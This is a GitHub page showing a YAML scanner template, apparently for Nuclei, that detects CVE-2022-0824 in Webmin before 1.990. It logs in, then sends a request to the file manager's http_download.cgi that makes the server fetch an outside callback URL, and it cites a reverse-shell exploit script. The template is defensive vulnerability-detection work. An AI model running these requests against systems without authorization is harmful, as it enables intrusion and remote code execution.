-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2022-0824.yaml
40 lines (33 loc) · 1.24 KB
/
CVE-2022-0824.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: CVE-2022-0824
info:
name: Webmin below 1.990 - File Manager privilege exploit
author: cckuailong
severity: high
description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
reference:
- https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-0824
tags: cve,cve2022,webmin,privilege,auth
requests:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: redirect=1;testing=1;PHPSESSID=;
user={{username}}&pass={{password}}
- |
POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/filemin/?xnavigation=1
link=http://{{interactsh-url}}&username=&password=&path=/xxx
cookie-reuse: true
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"